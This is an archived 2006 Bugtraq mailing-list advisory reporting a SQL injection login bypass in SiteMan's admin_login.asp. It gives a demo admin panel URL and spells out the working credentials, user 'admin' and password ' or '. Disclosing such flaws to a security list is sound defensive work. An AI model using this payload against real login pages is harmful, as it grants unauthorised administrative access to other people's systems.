SiteMan <= All version SQL injection in admin_login.asp

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SiteMan <= All version SQL injection in admin_login.asp
From: ali@xxxxxxxxxx
Date: 1 Apr 2006 19:57:08 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Vendor : SiteMan
Target Page : admin_login.asp
Bug Finder : S3rv3r_hack3r
administrator panel (demo): http://www.ispdemos.com/Demo/SiteMan/admin_login.asp
WWW : http://www.ispofegypt.com/
you can login to admin_login.asp with >>
user : admin
pass : ' or '

Prev by Date: Re: recursive DNS servers DDoS as a growing DDoS problem
Next by Date: Secunia Research: AN HTTPD Script Source Disclosure Vulnerability
Previous by thread: GeSWall 2.2 – Free Intrusion Prevention System for Windows
Next by thread: Secunia Research: AN HTTPD Script Source Disclosure Vulnerability
Index(es):
- Date
- Thread